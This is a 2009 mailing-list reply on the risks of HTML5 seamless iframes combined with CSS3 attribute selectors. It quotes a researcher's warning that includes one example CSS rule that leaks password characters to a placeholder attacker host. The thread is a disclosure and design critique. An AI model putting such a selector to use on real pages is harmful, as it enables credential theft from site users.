Re: Seamless iframes + CSS3 selectors = bad idea

I see.  The issue is that the attacker can inject CSS + iframes, but
not script, into one page in an origin.  Now with seemless+CSS3, the
attacker can steal information from the entire origin.  Very cool!


On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <> wrote:
> I sincerely understand why people want seamless iframes on HTML5.. I mean,
> I've been there.. but sometimes the better way to do something is not to do
> it.
> The perfect example are seamless iframes (defined in html5) and CSS3
> selectors.
> I've showed (together with David Lindsay, and Gareth Heyes) expressed
> several times that we think this is a bad idea.
> We always receive the same answer "seamless iframes are same-origin!" and
> believe me, I know.. but guess what? javascript is also same origin.. and it
> also creates problems.
> What I see with those awesome CSS3 selectors such as:
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary files
> from the page WITHOUT the need of JS.
> I really hope people in here know that a cool feature is sometimes not such
> a good idea, and hopefully, we can see how to resolve this issue..
> References: The Sexy Assassin - BlueHat 2008 Presentation
> Favorite XSS - BlackHat 2009 Presentation
> Stefano Di Paola PoC
> Greetings!!
> -- Eduardo

Received on Saturday, 5 December 2009 16:56:05 UTC